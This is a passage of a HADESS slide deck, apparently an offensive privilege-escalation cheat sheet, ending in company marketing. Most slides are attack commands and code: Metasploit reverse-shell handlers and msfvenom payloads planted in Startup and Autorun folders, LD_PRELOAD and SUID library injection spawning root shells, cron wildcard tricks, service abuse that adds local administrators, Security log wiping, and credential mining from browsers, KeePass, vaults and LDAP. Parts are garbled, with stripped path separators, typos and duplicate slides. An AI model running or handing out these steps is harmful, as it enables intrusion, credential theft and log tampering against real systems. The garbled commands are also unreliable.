Used Detection
  • 22. Domain: No Local Admin: Yes OS: Windows Type: Enumeration & Hunt ./WELA.ps1 -LogFile .Security.evtx -EventIDStatistics flog -s 10s -n 200 invoke-module LogCleaner.ps1 Or PASSWORD MINING IN GENERAL EVENTS VIA SEAUDIT HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 23. Domain: No Local Admin: Yes OS: Windows Type: Enumeration & Hunt ./WELA.ps1 -LogFile .Security.evtx -EventIDStatistics flog -s 10s -n 200 wevtutil cl Security Or PASSWORD MINING IN SECURITY EVENTS VIA SESECURITY HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 24. Domain: No Local Admin: Yes OS: Windows Type: Enumeration & Hunt In Metasploit (msf > prompt) type: use multi/handler In Metasploit (msf > prompt) type: set payload windows/meterpreter/reverse_tcp In Metasploit (msf > prompt) type: set lhost [Kali VM IP Address] In Metasploit (msf > prompt) type: run Open another command prompt and type: msfvenom -p windows/meterpreter/reverse_tcp LHOST=[Kali VM IP Address] -f exe -o x.exe Place x.exe in “C:ProgramDataMicrosoftWindowsStart MenuProgramsStartup”. 1. 2. STARTUP APPLICATIONS HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 25. Domain: No Local Admin: Yes OS: Windows Type: Enumeration & Hunt SharpUp.exe McAfeeSitelistFiles PASSWORD MINING IN MCAFEESITELISTFILES HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 26. Domain: No Local Admin: Yes OS: Windows Type: Enumeration & Hunt SharpUp.exe CachedGPPPassword PASSWORD MINING IN CACHEDGPPPASSWORD HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 27. Domain: No Local Admin: Yes OS: Windows Type: Enumeration & Hunt SharpUp.exe DomainGPPPassword PASSWORD MINING IN DOMAINGPPPASSWORD HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 28. Domain: No Local Admin: Yes OS: Windows Type: Enumeration & Hunt Seatbelt.exe keepass KeeTheft.exe Or PASSWORD MINING IN KEEPASS HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 29. Domain: No Local Admin: Yes OS: Windows Type: Enumeration & Hunt Seatbelt.exe WindowsVault PASSWORD MINING IN WINDOWSVAULT HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 30. Domain: No Local Admin: Yes OS: Windows Type: Enumeration & Hunt Seatbelt.exe SecPackageCreds PASSWORD MINING IN SECPACKAGECREDS HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 31. Domain: No Local Admin: Yes OS: Windows Type: Enumeration & Hunt Seatbelt.exe PuttyHostKeys PASSWORD MINING IN PUTTYHOSTKEYS HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 32. Domain: No Local Admin: Yes OS: Windows Type: Enumeration & Hunt Seatbelt.exe RDCManFiles PASSWORD MINING IN RDCMANFILES HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 33. Domain: No Local Admin: Yes OS: Windows Type: Enumeration & Hunt Seatbelt.exe RDPSavedConnections PASSWORD MINING IN RDPSAVEDCONNECTIONS HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 34. Domain: No Local Admin: Yes OS: Windows Type: Enumeration & Hunt SharpDPAPI masterkeys PASSWORD MINING IN MASTERKEYS HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 35. Domain: No Local Admin: Yes OS: Windows Type: Enumeration & Hunt SharpWeb.exe all PASSWORD MINING IN BROWSERS HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 36. Domain: No Local Admin: Yes OS: Windows Type: Enumeration & Hunt SauronEye.exe -d C:UsersvincentDesktop --filetypes .txt .doc .docx .xls --contents --keywords password pass* -v` PASSWORD MINING IN FILES HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 37. Domain: No Local Admin: Yes OS: Windows Type: Enumeration & Hunt SharpLDAPSearch.exe "(&(objectClass=user)(cn=*svc*))" "samaccountname" Import-Module .PowerView.ps1 Get-DomainComputer COMPUTER -Properties ms-mcs- AdmPwd,ComputerName,ms-mcs-AdmPwdExpirationTime Or PASSWORD MINING IN LDAP HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 38. Domain: No Local Admin: Yes OS: Windows Type: Enumeration & Hunt execute-assembly /root/SharpClipHistory.exe PASSWORD MINING IN CLIPBOARD HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 39. Domain: No Local Admin: Yes OS: Windows Type: Delegate tokens GMSAPasswordReader.exe --accountname SVC_SERVICE_ACCOUNT PASSWORD MINING IN GMSA PASSWORD HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 40. Domain: Y/N Local Admin: Yes OS: Windows Type: Delegate tokens ./fake_rdp.py pyrdp-mitm.py 192.168.1.10 -k private_key.pem -c certificate.pem Or DELEGATE TOKENS VIA RDP HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 41. Domain: Y/N Local Admin: Yes OS: Windows Type: Delegate tokens FakeFtpServer fakeFtpServer = new FakeFtpServer(); fakeFtpServer.addUserAccount(new UserAccount("user", "password", "c:data")); FileSystem fileSystem = new WindowsFakeFileSystem(); fileSystem.add(new DirectoryEntry("c:data")); fileSystem.add(new FileEntry("c:datafile1.txt", "abcdef 1234567890")); fileSystem.add(new FileEntry("c:datarun.exe")); fakeFtpServer.setFileSystem(fileSystem); fakeFtpServer.start(); DELEGATE TOKENS VIA FTP HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 42. Domain: No Local Admin: Yes OS: Windows Type: Phish execute-assembly fakelogonscreen.exe FAKE LOGON SCREEN HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 43. Domain: Y/N Local Admin: Yes OS: Windows Type: Abuse Service RogueWinRM.exe -p C:windowssystem32cmd.exe ABUSING WINRM SERVICES HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 44. Domain: Yes Local Admin: Yes OS: Windows Type: Abuse Certificate ceritify.exe request /ca:dc.domain.localDC-CA /template:User… Rubeus.exe asktgy /user:CORPitadmin /certificate:C:cert.pfx /password:password CERTIFICATE ABUSE HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 45. Domain: No Local Admin: Yes OS: Linux Type: Injection gcc -fPIC -shared -o /tmp/ldreload.so ldreload.c -nostartfiles sudo LD_RELOAD=tmp/ldreload.so apache2 id 1. #include <stdio.h> #include <sys/types.h> #include <stdlib.h> void _init() { unsetenv("LD_PRELOAD"); setgid(0); setuid(0); system("/bin/bash"); } 2. 3. 4. SUDO LD_PRELOAD HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 46. Domain: No Local Admin: Yes OS: Linux Type: Injection Mkdir /home/user/.config gcc -shared -o /home/user/.config/libcalc.so - fPIC/home/user/.config/libcalc.c /usr/local/bin/suid-so id 1. 2. #include <stdio.h> #include <stdlib.h> static void inject() _attribute _((constructor)); void inject() { system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p"); } 3. 4. 5. ABUSING FILE PERMISSION VIA SUID BINARIES - (.SO INJECTION) HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 47. Domain: Y/N Local Admin: Yes OS: Windows Type: Injection 1. RemoteDLLInjector64 Or MemJect Or https://github.com/tomcarver16/BOF-DLL-Inject 2. #define PROCESS_NAME "csgo.exe" Or RemoteDLLInjector64.exe pid C:runforpriv.dll Or mandllinjection ./runforpriv.dll pid DLL INJECTION HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 48. Domain: No Local Admin: Yes OS: Windows Type: Injection hollow svchost.exe pop.bin EARLY BIRD INJECTION HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 49. Domain: No Local Admin: Yes OS: Windows Type: Injection sec-shinject PID /path/to/bin PROCESS INJECTION THROUGH MEMORY SECTION HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 50. Domain: No Local Admin: Yes OS: Linux Type: Abusing Scheduled Tasks echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > systemupdate.sh; chmod +x systemupdate.sh Wait a while /tmp/bash -p id && whoami ABUSING SCHEDULED TASKS VIA CRON PATH OVERWRITE HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 51. Domain: No Local Admin: Yes OS: Linux Type: Abusing Scheduled Tasks echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/systemupdate.sh; touch /home/user/ --checkpoint=1; touch /home/user/ --checkpoint-action=exec=shsystemupdate.sh Wait a while /tmp/bash -p id && whoami ABUSING SCHEDULED TASKS VIA CRON WILDCARDS HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 52. Domain: No Local Admin: Yes OS: Linux Type: Abusing File Permission su - www-data; nginxed-root.sh /var/log/nginx/error.log; In root user invoke-rc.d nginx rotate >/dev/null 2>&1 1. 2. 3. ABUSING FILE PERMISSION VIA SUID BINARIES - SYMLINK) HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 53. Domain: No Local Admin: Yes OS: Linux Type: Abusing File Permission su - www-data; nginxed-root.sh /var/log/nginx/error.log; In root user invoke-rc.d nginx rotate >/dev/null 2>&1 1. 2. 3. ABUSING FILE PERMISSION VIA SUID BINARIES - SYMLINK) HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 54. Domain: No Local Admin: Yes OS: Linux Type: Abusing File Permission 1. echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' >/tmp/service.c; 2. gcc /tmp/services.c -o /tmp/service; 3. export PATH=/tmp:$PATH; 4. /usr/local/bin/sudi-env; id ABUSING FILE PERMISSION VIA SUID BINARIES - ENVIRONMENT VARIABLES #1) HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 55. Domain: No Local Admin: Yes OS: Linux Type: Abusing File Permission env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp && chown root.root /tmp/bash && chmod +S /tmp/bash)' /bin/sh -c /usr/local/bin/suid-env2; set +x; /tmp/bash -p' ABUSING FILE PERMISSION VIA SUID BINARIES - ENVIRONMENT VARIABLES #2) HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 56. Domain: No Local Admin: Yes OS: Windows Type: Abuse Privilege Windows_dll.c: cmd.exe /k net localgroup administrators user /add x86_64-w64-mingw32-gcc windows_dll.c -shared -o hijackme.dll sc stop dllsvc & sc start dllsvc 1. 2. 3. DLL HIJACKING HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 57. Domain: No Local Admin: Yes OS: Windows Type: Abuse Privilege sc config daclsvc binpath= "net localgroup administrators user /add" sc start daclsvc 1. 2. ABUSING SERVICES VIA BINPATH HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 58. Domain: No Local Admin: Yes OS: Windows Type: Abuse Privilege msfvenom -p windows/exec CMD='net localgroup administrators user /add' -f exe-service -o common.exe Place common.exe in ‘C:Program FilesUnquoted Path Service’. sc start unquotedsvc 1. 2. 3. ABUSING SERVICES VIA UNQUOTED PATH HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 59. Domain: No Local Admin: Yes OS: Windows Type: Abuse Privilege reg add HKLMSYSTEMCurrentControlSetservicesregsvc /v ImagePath /t REG_EXPAND_SZ /d c:tempx.exe /f sc start regsvc 1. 2. ABUSING SERVICES VIA REGISTRY HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 60. Domain: No Local Admin: Yes OS: Windows Type: Abuse Privilege copy /y c:Tempx.exe "c:Program FilesFile Permissions Servicefilepermservice.exe" sc start filepermsvc 1. 2. ABUSING SERVICES VIA EXECUTABLE FILE HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 61. Domain: No Local Admin: Yes OS: Windows Type: Abuse Privilege 1. In Metasploit (msf > prompt) type: use multi/handler In Metasploit (msf > prompt) type: set payload windows/meterpreter/reverse_tcp In Metasploit (msf > prompt) type: set lhost [Kali VM IP Address] In Metasploit (msf > prompt) type: run Open an additional command prompt and type: msfvenom -p windows/meterpreter/reverse_tcp lhost=[Kali VM IP Address] -f exe -o program.exe 2. Place program.exe in ‘C:Program FilesAutorun Program’. ABUSING SERVICES VIA AUTORUN HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 62. Domain: No Local Admin: Yes OS: Windows Type: Abuse Privilege 1. msfvenom -p windows/exec CMD='net localgroup administrators user /add' -f msi-nouac -o setup.msi 2. msiexec /quiet /qn /i C:Tempsetup.msi Or SharpUp.exe AlwaysInstallElevated ABUSING SERVICES VIA ALWAYSINSTALLELEVATED HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 63. Domain: Y/N Local Admin: Yes OS: Windows Type: Abuse Privilege 1. .load C:devPrivEditorx64ReleasePrivEditor.dll 2. !rmpriv ABUSING SERVICES VIA SECREATETOKEN HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 64. Domain: Y/N Local Admin: Yes OS: Windows Type: Abuse Privilege 1. Conjure-LSASS Or syscall_enable_priv 20 ABUSING SERVICES VIA SEDEBUG HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 65. Domain: Y/N Local Admin: Yes OS: Windows Type: Abuse Privilege injectEtwBypass pid REMOTE PROCESS VIA SYSCALLS (HELLSGATE|HALOSGATE) HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 66. Domain: Y/N Local Admin: Yes OS: Windows Type: Abuse Privilege PrimaryTokenTheft.exe pid TokenPlaye.exe --impersonate --pid pid Or ESCALATE WITH DUPLICATETOKENEX HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 67. Domain: Y/N Local Admin: Yes OS: Windows Type: Abuse Privilege start /realtime SomeCpuIntensiveApp.exe ABUSING SERVICES VIA SEINCREASEBASEPRIORITY HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 68. Domain: Y/N Local Admin: Yes OS: Windows Type: Abuse Privilege Just only compile and run SeManageVolumeAbuse ABUSING SERVICES VIA SEMANAGEVOLUME HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 69. Domain: Y/N Local Admin: Yes OS: Windows Type: Abuse Privilege WRITE_OWNER access to a resource, including files and folders. Run for privilege escalation 1. 2. ABUSING SERVICES VIA SERELABEL HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 70. Domain: Y/N Local Admin: Yes OS: Windows Type: Abuse Privilege 1. Launch PowerShell/ISE with the SeRestore privilege present. 2. Enable the privilege with Enable-SeRestorePrivilege). 3. Rename utilman.exe to utilman.old 4. Rename cmd.exe to utilman.exe 5. Lock the console and press Win+U ABUSING SERVICES VIA SERESTORE HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 71. Domain: Y/N Local Admin: Yes OS: Windows Type: Abuse Privilege 1. In Metasploit (msf > prompt) type: use auxiliary/server/capture/http_basic In Metasploit (msf > prompt) type: set uripath x In Metasploit (msf > prompt) type: run 2. In taskmgr and right-click on the “iexplore.exe” in the “Image Name” column and select “Create Dump File” from the popup menu. 3. strings /root/Desktop/iexplore.DMP | grep "Authorization: Basic" Select the Copy the Base64 encoded string. In command prompt type: echo -ne [Base64 String] | base64 -d ABUSE VIA SEBACKUP HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 72. Domain: Y/N Local Admin: Yes OS: Windows Type: Abuse Privilege HIBR2BIN /PLATFORM X64 /MAJOR 6 /MINOR 1 /INPUT hiberfil.sys /OUTPUT uncompressed.bin ABUSING VIA SECREATEPAGEFILE HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 73. Domain: Y/N Local Admin: Yes OS: Windows Type: Abuse Privilege .load C:devPrivEditorx64ReleasePrivEditor.dll TrustExec.exe -m exec -c "whoami /priv" -f 1. 2. ABUSING VIA SESYSTEMENVIRONMENT HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 74. Domain: Y/N Local Admin: Yes OS: Windows Type: Abuse Privilege 1. takeown.exe /f "%windir%system32" 2. icalcs.exe "%windir%system32" /grant "%username%":F 3. Rename cmd.exe to utilman.exe 4. Lock the console and press Win+U ABUSING VIA SETAKEOWNERSHIP HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 75. Domain: Y/N Local Admin: Yes OS: Windows Type: Abuse Privilege PSBits PrivFu psexec.exe -i -s -d cmd.exe 1. Or 2. ABUSING VIA SETCB HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 76. Domain: Y/N Local Admin: Yes OS: Windows Type: Abuse Privilege .load C:devPrivEditorx64ReleasePrivEditor.dll CredManBOF TrustExec.exe -m exec -c "whoami /priv" -f 1. Or 2. ABUSING VIA SETRUSTEDCREDMANACCESS HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 77. Domain: Y/N Local Admin: Yes OS: Windows Type: Abuse Privilege JuicyPotato.exe Or https://github.com/decoder-it/juicy_2 https://github.com/antonioCoco/RoguePotato ABUSING TOKENS VIA SEASSIGNPRIMARYTOKEN HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 78. Domain: Y/N Local Admin: Yes OS: Windows Type: Abuse Privilege ./WELA.ps1 -LogFile .Security.evtx -EventIDStatistics flog -s 10s -n 200 invoke-module LogCleaner.ps1 1. 2. Or ABUSING VIA SECREATEPAGEFILE HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 79. HADESS | SECURE AGILE DEVELOPMENT About Hadess Savior of your Business to combat cyber threats Hadess performs offensive cybersecurity services through infrastructures and software that include vulnerability analysis, scenario attack planning, and implementation of custom integrated preventive projects. We organized our activities around the prevention of corporate, industrial, and laboratory cyber threats. Contact Us To request additional information about Hadess’s services, please fill out the form below. A Hadess representative will contact you shortly. Email: Marketing@hadess.io Phone No. +989362181112 Company No. +982128427515 +982177873383 Website: www.hadess.io hadess_security
  • 80. HADESS | SECURE AGILE DEVELOPMENT Hadess Products and Services Fully assess your organization’s threat detection and response capabilities with a simulated cyber-attack. Penetration Testing | PROTECTION PRO Fully assess your organization’s threat detection and response capabilities with a simulated cyber-attack. Red Teaming Operation | PROTECTION PRO Identifying and helping to address hidden weaknesses in your organization’s security. RASP | Protect Applications and APIs Anywhere Identifying and helping to address hidden weaknesses in your Applications. SAST | Audit Your Products Identifying and helping to address hidden weaknesses in your organization’s security PWN Z1 | Audit Your PPP